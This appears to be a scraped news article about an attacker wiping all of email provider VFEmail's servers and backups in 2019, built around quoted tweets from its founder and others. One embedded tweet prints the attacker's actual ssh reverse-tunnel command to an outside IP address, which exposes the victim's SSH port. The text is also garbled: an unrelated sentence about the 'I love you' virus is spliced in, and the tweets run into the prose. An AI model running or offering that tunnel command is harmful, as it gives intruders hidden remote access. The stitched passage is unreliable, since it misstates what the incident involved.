?Catastrophic? hack on email provider destroys almost two decades of data

Email provider VFEmail said it has suffered a catastrophic destruction of all of its servers by an unknown assailant who wiped out almost two decades' worth of data and backups in a matter of hours.“Yes, @VFEmail is effectively gone,” VFEmail founder Rick Romero wrote on Twitter Tuesday morning after watching someone methodically reformat hard drives of the service he started in 2001. via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null aktv@94.155.49.9 -R 127.0.0.1:30081:127.0.0.1:22 -N— VFEmail.net (@VFEmail) February 11, 2019The damage, Romero reported, extended to VFEmail’s “entire infrastructure,” including mail hosts, virtual machine hosts, and a SQL server cluster. The virus got its name because it was transmitted in emails with the subject “I love you.” The service aimed to offer a better email experience by scanning messages for malware on the server.“We strive to build an economical and redundant system, to provide our users with as much uptime as possible,” VFEmail’s about page said. To reformat a sql cluster (whaa?), and hit off-site NL hosted vms at the same time seems pretty nefarious to me.— Havokmon (@Havokmon) February 12, 2019He went on to say that the attacker used multiple means of access onto the VFEmail infrastructure and as a result, it wasn’t clear two-factor authentication would have stopped the intrusion.“2FA only works if the access method was via authentication, as opposed to exploit,” he explained.